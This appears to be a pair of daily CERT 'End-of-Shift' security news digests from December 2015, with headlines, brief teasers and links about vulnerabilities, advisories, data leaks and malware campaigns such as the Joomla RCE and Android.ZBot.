http://resources.infosecinstitute.com/attacking-wpa2-enterprise/
*** Open Source Network Security Tools for Newbies ***
---------------------------------------------
With so many open source tools available to help with network security, it can be tricky to figure out where to start, especially if you are an IT generalist who has been tasked with security. We all have to start somewhere. The question is, where? The sheer number of open source tools available can make ..
---------------------------------------------
https://www.alienvault.com/blogs/security-essentials/open-source-network-se…
*** [HTB23282]: RCE in Zen Cart via Arbitrary File Inclusion ***
---------------------------------------------
High-Tech Bridge Security Research Lab discovered a critical vulnerability in the popular e-commerce software Zen Cart, which can be exploited by remote non-authenticated attackers to compromise the vulnerable system. A remote ..
---------------------------------------------
https://www.htbridge.com/advisory/HTB23282
*** Crimeware / APT Malware Masquerade as Santa Claus and Christmas Apps ***
---------------------------------------------
CloudSek was monitoring an underground hacking team that was selling desktop malware in various underground forums. The malware is specifically designed to jump air-gapped systems, and, given the type of documents the attackers are seeking, it was collecting classified data from software companies and government organisations.
---------------------------------------------
https://www.cloudsek.com/announcements/blog/apt-malware-masquerade-as-chris…
=======================
= End-of-Shift report =
=======================
Timeframe: Monday 14-12-2015 18:00 − Tuesday 15-12-2015 18:00
Handler: Stephan Richter
Co-Handler: n/a
*** 13 million MacKeeper users exposed after MongoDB door was left open ***
---------------------------------------------
Expect more breaches in the future as 35,000 MongoDB installs are misconfigured.
---------------------------------------------
http://arstechnica.com/security/2015/12/13-million-mackeeper-users-exposed-…
*** Hack: ESA users have short passwords ***
---------------------------------------------
Numerous internal records of the European Space Agency (ESA) have been hacked and are now viewable on the Internet. Apparently many ESA users use short, insecure passwords.
---------------------------------------------
http://www.golem.de/news/rocket-science-esa-nutzer-haben-kurze-passwoerter-…
*** Vulnerability Details: Joomla! Remote Code Execution ***
---------------------------------------------
The Joomla! team released a new version of Joomla! CMS yesterday to patch a serious and easy to exploit remote code execution vulnerability that affected pretty much all versions of the platform up to 3.4.5. As soon as the patch was released, we were able to start our investigation and found that it was already ..
---------------------------------------------
https://blog.sucuri.net/2015/12/joomla-remote-code-execution-the-details.ht…
*** 4 Things to Consider When Assessing Device Posture for Effective Network Access Control ***
---------------------------------------------
Guest blogger Benny Czarny explains that one of the main reasons to have a NAC system in place is to keep risky devices from connecting to your organization's network. Unfortunately, simply purchasing a NAC solution is not going to guarantee your protection.
---------------------------------------------
https://blog.malwarebytes.org/online-security/2015/12/4-things-to-consider-…
*** Protecting Windows Networks - Kerberos Attacks ***
---------------------------------------------
MEDIA NOTE: This is not a new flaw, just a good write-up! I don't know why the media are reporting this as a new flaw. | Kerberos is an authentication protocol that is used by default in Windows networks and provides mutual authentication and authorization for clients and servers. It does not require you to send a password or a hash over the wire; instead, it relies on a trusted third party to handle all the details. | Although it is considered a secure protocol, it has some flaws in Windows...
---------------------------------------------
http://dfir-blog.com/2015/12/13/protecting-windows-networks-kerberos-attack…
*** Kaspersky Security Bulletin 2015. Overall statistics for 2015 ***
---------------------------------------------
In 2015, virus writers demonstrated a particular interest in exploits for Adobe Flash Player. The proportion of relatively simple programs used in mass attacks was growing. Attackers have mastered non-Windows platforms - Android and Linux: almost all types of malicious programs are created and used for these platforms.
---------------------------------------------
http://securelist.com/analysis/kaspersky-security-bulletin/73038/kaspersky-…
*** Oil and Gas Cyber Security - Interview ***
---------------------------------------------
In the recent presentation at BlackHat, you mentioned that oil and gas is one of the industries most plagued by cyber-attacks. What makes oil and gas an attractive target? It's a juicy target for Cyberattacks as oil and gas companies are responsible for a great part of some countries' economies. Any interference in their work...
---------------------------------------------
http://resources.infosecinstitute.com/oil-and-gas-cyber-security-interview/
*** Android.ZBot banking Trojan uses "web injections" to steal confidential data ***
---------------------------------------------
December 15, 2015. Trojans designed to steal money from bank accounts pose a serious threat to Android users. The Android.ZBot Trojan is one of these malicious programs. Its various modifications have been targeting the mobile devices of Russian users since February 2015. This Trojan is interesting due to its ability to steal logins, passwords, and other confidential data by displaying fraudulent authentication forms on top of any application. The appearance of such forms is generated on
---------------------------------------------
http://news.drweb.com/show/?i=9754&lng=en&c=9
*** Security Afterworks: How to become a TLS hipster & Best of CCC ***
---------------------------------------------
January 21, 2016, 5:00 pm - 6:00 pm, SBA Research, Favoritenstraße 16, 1040 Wien
---------------------------------------------
https://www.sba-research.org/events/security-afterworks-wie-man-tls-hipster…
*** ZDI-15-639: (0Day) Microsoft Office Excel Binary Worksheet Use-After-Free Remote Code Execution Vulnerability ***
---------------------------------------------
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Office Excel. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.
---------------------------------------------
http://www.zerodayinitiative.com/advisories/ZDI-15-639/
*** ZDI-15-638: (0Day) Apache TomEE Deserialization of Untrusted Data Remote Code Execution Vulnerability ***
---------------------------------------------
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apache TomEE. Authentication is not required to exploit this vulnerability.
---------------------------------------------
http://www.zerodayinitiative.com/advisories/ZDI-15-638/
*** Security Advisory: RSA-CRT key leak vulnerability CVE-2015-5738 ***
---------------------------------------------
https://support.f5.com:443/kb/en-us/solutions/public/k/91/sol91245485.html?…
*** Cisco Unified Communications Manager Web Management Interface Cross-Site Scripting Filter Bypass Vulnerability ***
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** Cisco IOS XE Software IPv6 Neighbor Discovery Denial of Service Vulnerability ***
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** Cisco Unified Communications Manager Web Applications Identity Management Subsystem Denial of Service Vulnerability ***
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** Security Notice - Statement on NTP.org and CERT/CC Revealing Security Vulnerabilities in NTPd ***
---------------------------------------------
http://www.huawei.com/en/security/psirt/security-bulletins/security-notices…
*** TYPO3 CMS 6.2.16 and 7.6.1 released ***
---------------------------------------------
The TYPO3 Community announces the versions 6.2.16 LTS and 7.6.1 LTS of the TYPO3 Enterprise Content Management System.
Both versions are maintenance releases and contain bug and security fixes.
In case the extension mediace is used, please make sure to upgrade to version 7.6.1.
---------------------------------------------
http://www.typo3.org/news/article/typo3-cms-6216-and-761-released/
---------------------------------------------
*** Cross-Site Scripting in TYPO3 component Indexed Search ***
http://www.typo3.org/news/article/cross-site-scripting-in-typo3-component-i…
---------------------------------------------
*** TYPO3 is susceptible to Cross-Site Flashing ***
http://www.typo3.org/news/article/typo3-is-susceptible-to-cross-site-flashi…
---------------------------------------------
*** Multiple Cross-Site Scripting vulnerabilities in frontend ***
http://www.typo3.org/news/article/multiple-cross-site-scripting-vulnerabili…
---------------------------------------------
*** Cross-Site Scripting vulnerability in typolinks ***
http://www.typo3.org/news/article/cross-site-scripting-vulnerability-in-typ…
---------------------------------------------
*** Multiple Cross-Site Scripting vulnerabilities in TYPO3 backend ***
http://www.typo3.org/news/article/multiple-cross-site-scripting-vulnerabili…
---------------------------------------------
*** Cross-Site Scripting in TYPO3 component Extension Manager ***
http://www.typo3.org/news/article/cross-site-scripting-in-typo3-component-e…
---------------------------------------------
=======================
= End-of-Shift report =
=======================
Timeframe: Friday 11-12-2015 18:00 − Monday 14-12-2015 18:00
Handler: Stephan Richter
Co-Handler: Alexander Riepl
*** IBM Security Bulletin ***
---------------------------------------------
*** Vulnerability in Apache Commons affects WebSphere Message Broker and IBM Integration Bus (CVE-2015-7450) ***
http://www.ibm.com/support/docview.wss?uid=swg21972391
---------------------------------------------
*** Vulnerability in Apache Commons affects Tivoli Network Manager Transmission Edition (CVE-2015-7450) ***
http://www.ibm.com/support/docview.wss?uid=swg21971891
---------------------------------------------
*** Vulnerability in Apache Commons affects Rational Developer for System z (CVE-2015-7450) ***
http://www.ibm.com/support/docview.wss?uid=swg21971643
---------------------------------------------
*** Vulnerability in the IBM Installation Manager script (CVE-2015-7442) ***
http://www.ibm.com/support/docview.wss?uid=swg21971295
---------------------------------------------
*** Vulnerability in Apache Commons affects Rational Software Architect, Rational Software Architect for WebSphere Software and Rational Software Architect RealTime (CVE-2015-7450) ***
http://www.ibm.com/support/docview.wss?uid=swg21972753
---------------------------------------------
*** Vulnerabilities in OpenSSL affect IBM Rational Application Developer for WebSphere Software (CVE-2015-3193, CVE-2015-3194, CVE-2015-3195, CVE-2015-3196, CVE-2015-1794) ***
http://www.ibm.com/support/docview.wss?uid=swg21972951
---------------------------------------------
*** A security vulnerability has been identified in IBM Maximo Asset Management which could allow an attacker to obtain sensitive information via REST API (CVE-2015-7452) ***
http://www.ibm.com/support/docview.wss?uid=swg21972463
---------------------------------------------
*** IBM Maximo Asset Management is vulnerable to cross-site scripting, caused by improper validation of user-supplied input (CVE-2015-7451) ***
http://www.ibm.com/support/docview.wss?uid=swg21972423
---------------------------------------------
*** IBM Security Network Intrusion Prevention System is affected by krb5 vulnerabilities (CVE-2014-4341, CVE-2013-1418) ***
http://www.ibm.com/support/docview.wss?uid=swg21970321
---------------------------------------------
*** A vulnerability in OpenSSH affects IBM Security Network Intrusion Prevention System (CVE-2015-5600) ***
http://www.ibm.com/support/docview.wss?uid=swg21969673
---------------------------------------------
*** A vulnerability in net-snmp affects IBM Security Network Intrusion Prevention System (CVE-2014-3565) ***
http://www.ibm.com/support/docview.wss?uid=swg21972208
---------------------------------------------
*** Vulnerabilities in curl affect IBM Security Network Intrusion Prevention System ***
http://www.ibm.com/support/docview.wss?uid=swg21968978
---------------------------------------------
*** A security vulnerability has been identified in IBM Rational ClearQuest (CVE-2015-4996) ***
http://www.ibm.com/support/docview.wss?uid=swg21972331
---------------------------------------------
*** Multiple vulnerabilities in IBM Java Runtime affect IBM Tivoli Provisioning Manager (CVE-2015-2601, CVE-2015-1931, CVE-2015-2625) ***
http://www.ibm.com/support/docview.wss?uid=swg21972941
---------------------------------------------
*** Vulnerabilities in OpenSSL affect IBM Cognos Planning (CVE-2015-1789, CVE-2015-1790, CVE-2015-1792) ***
http://www.ibm.com/support/docview.wss?uid=swg21971729
---------------------------------------------
*** Website Malware - Evolution of Pseudo Darkleech ***
---------------------------------------------
Last March we described a WordPress attack that was responsible for hidden iframe injections that resembled Darkleech injections: declarations of styles with random names and coordinates, iframes with No-IP host names, and random dimensions where the ..
---------------------------------------------
https://blog.sucuri.net/2015/12/evolution-of-pseudo-darkleech.html
*** iTunes 12.3.2 ***
---------------------------------------------
https://support.apple.com/kb/HT205636
*** Security Advisory: Apache Groovy vulnerability CVE-2015-3253 ***
---------------------------------------------
The MethodClosure class in runtime/MethodClosure.java in Apache Groovy 1.7.0 through 2.4.3 allows remote attackers to execute arbitrary code or cause a denial of service via a crafted serialized object. (CVE-2015-3253)
---------------------------------------------
https://support.f5.com:443/kb/en-us/solutions/public/k/49/sol49233165.html
*** Security Update 2015-006 Yosemite ***
---------------------------------------------
https://support.apple.com/kb/HT205653
*** OS X El Capitan 10.11.2, Security Update 2015-005 Yosemite, and Security Update 2015-008 Mavericks ***
---------------------------------------------
https://support.apple.com/kb/HT205637
*** OS X El Capitan 10.11.1, Security Update 2015-004 Yosemite, and Security Update 2015-007 Mavericks ***
---------------------------------------------
https://support.apple.com/kb/HT205375
*** What Signs Are You Missing? ***
---------------------------------------------
While recently listening to a presentation, I found my attention drawn to a metal water container at the center of the conference room table. Condensation was all around it and without ever having to interact with the container, I found ..
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=20481
*** Google Bans Symantec Root Certificates ***
---------------------------------------------
An anonymous reader writes: After Google discovered in September SSL certificates issued in its name by Symantec, and after the company discovered in October over 2,500 ..
---------------------------------------------
http://tech.slashdot.org/story/15/12/12/2255212/google-bans-symantec-root-c…
*** DSA-3416 libphp-phpmailer - security update ***
---------------------------------------------
Takeshi Terada discovered a vulnerability in PHPMailer, a PHP library for email transfer, used by many CMSs. The library accepted email addresses and SMTP commands containing line breaks, which can be abused by an attacker to inject messages.
---------------------------------------------
https://www.debian.org/security/2015/dsa-3416
*** Memory-resident modular malware menaces moneymen ***
---------------------------------------------
Latentbot avoids your HDD - and it's been off the radar for two years. A stealthy strain of malware resident only in memory has been quietly pwning victims around the world for two years.
---------------------------------------------
www.theregister.co.uk/2015/12/14/latentbot_memory_resident_malware/
*** Lenovo/CSR: Bluetooth driver installs root certificate ***
---------------------------------------------
A Bluetooth driver for chips made by the company CSR installs two root certificates with which the holder of the private key could attack HTTPS connections. Apparently these are test certificates used for driver signing during development.
---------------------------------------------
http://www.golem.de/news/lenovo-csr-bluetooth-treiber-installiert-root-zert…
*** Inside the German cybercriminal underground ***
---------------------------------------------
Trend Micro investigated on German crime forums and concluded that Germany possesses the most advanced cybercrime ecosystem in the European Union. We have reported several times the news related to various criminal cybercriminal ..
---------------------------------------------
http://securityaffairs.co/wordpress/42802/cyber-crime/german-cybercriminal-…
*** [20151214] - Core - Remote Code Execution Vulnerability ***
---------------------------------------------
Browser information is not filtered properly while saving the session values into the database, which leads to a Remote Code Execution vulnerability.
---------------------------------------------
https://developer.joomla.org/security-centre/630-20151214-core-remote-code-…
*** [20151214] - Core - CSRF Hardening ***
---------------------------------------------
Add additional CSRF hardening in com_templates.
---------------------------------------------
https://developer.joomla.org/security-centre/633-20151214-core-csrf-hardeni…
*** [20151214] - Core - Directory Traversal ***
---------------------------------------------
Fails to properly sanitise input data from the XML install file located within the package archive.
---------------------------------------------
https://developer.joomla.org/security-centre/634-20151214-core-directory-tr…
*** Bugtraq: ERPSCAN Research Advisory [ERPSCAN-15-022] SAP NetWeaver 7.4 - XSS ***
---------------------------------------------
http://www.securityfocus.com/archive/1/537111
*** Bugtraq: [ERPSCAN-15-021] SAP NetWeaver 7.4 - SQL Injection vulnerability ***
---------------------------------------------
http://www.securityfocus.com/archive/1/537109
*** Security researcher: data leak at Mackeeper allows unrestricted access to user data ***
---------------------------------------------
The database of the controversial Mac software Mackeeper is freely accessible, a security researcher says. He states that he downloaded 13 million records containing user information without any hindrance.
---------------------------------------------
http://heise.de/-3043720